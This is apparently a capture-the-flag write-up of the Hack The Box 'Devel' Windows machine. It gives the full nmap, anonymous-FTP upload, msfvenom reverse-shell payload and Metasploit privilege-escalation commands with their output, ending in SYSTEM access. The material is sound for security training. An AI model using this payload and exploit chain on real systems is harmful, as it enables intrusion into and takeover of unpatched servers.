Devel @ hackthebox

Devel is a relatively easy hackthebox Windows machine, which can be done almost all the way with metasploit.

Enumeration

Lets run NMAP with nmap -sC -sT -oA nmap -n 10.10.10.5 (to check what each option does simply type nmap –help)

┌─[✗]─[luka@parrot]─[~/Desktop/htb/Devel/nmap]
└──╼ $sudo nmap -sC -sT -oA nmap -n 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-19 20:32 CET
Nmap scan report for 10.10.10.5
Host is up (0.028s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM
aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
| 03-21-19 10:13PM 914405 ipsec.aspx
|03-17-17  04:37PM               184946 welcome.png | ftp-syst:  | SYST: Windows_NT
80/tcp open http
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds

Before checking FTP server on the Devel machine i’d be normally wise to start gobuster/dirbuster in the background. It couldn’t find anything though.

We can log in onto FTP Server using anonymous/random_password credentials. We have write privileges as well.

Devel @ hackthebox

Test file could have been successfully transferred and we can also see the uploaded file on the web server in browser.

Devel @ hackthebox

Exploitation / Initial Foothold

We can obviously upload and run aspx files, so lets create payload in the msfvenom. I used shikata_ga_nai encoder which isn’t really helping that much if some kind of protection like antivirus/windows defender would be activated. I will use meterpreter for this box.

┌─[root@parrot]─[/home/luka/Desktop/htb/Devel/payload]
└──╼ #msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.5 LHOST=10.10.14.68 LPORT=5555 -e x86/shikata_ga_nai -o payload.aspx -f aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of aspx file: 2960 bytes
Saved as: payload.aspx

Payload was uploaded on the server using “put payload.aspx”.
We can run it in the browser. If everything was set up correctly, we should see a new session in the meterpreter.

Devel @ hackthebox
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web

Privilege Escalation

Since this is unpatched Windows 7 system, there are more than option available to escalate the privileges. One way is to use local exploit suggest module from Metasploit: “use post/multi/recon/local_exploit_suggester”

msf5 post(multi/recon/local_exploit_suggester) > run
[] 10.10.10.5 - Collecting local exploits for x86/windows… [] 10.10.10.5 - 29 exploit checks are being tried…
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

Another way would be to use more granular search – this way we also see the Rank of the exploit – this might make the decision easier:
“search platform:windows type:exploit arch:x86 -S privilege”

Devel @ hackthebox

I used the exploit/windows/local/ms16_016_webdav exploit for privilege escalation.

msf5 exploit(windows/local/ms16_016_webdav) > run
[] Started reverse TCP handler on 192.168.0.190:4444  [] Launching notepad to host the exploit…
[+] Process 3068 launched.
[] Reflectively injecting the exploit DLL into 3068… [] Exploit injected … injecting payload into 3068…
[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.

I ran ps in meterpreter, exploit above created a new process – notepad.exe running as SYSTEM.

3068 2096 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\notepad.exe

I could successfully migrate to the process and get SYSTEM privileges using getsystem.

meterpreter > migrate 3068
[] Migrating from 2052 to 3068 zlib(finalizer): the stream was freed prematurely. [] Migration completed successfully.
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

To switch between from Meterpreter and shell you simply type shell into meterpreters command line and with ctrl+z you can get back into the meterpreter.

c:\Users\babis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\babis\Desktop
18/03/2017 01:14
.
18/03/2017 01:14 ..
18/03/2017 01:18 32 user.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.573.169.664 bytes free
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
*deleted*

Directory of c:\Users\Administrator\Desktop
18/03/2017 01:17
.
18/03/2017 01:17 ..
18/03/2017 01:17 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.573.169.664 bytes free
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
*deleted*

We’ve now got System privileges on the box and both flags can be read.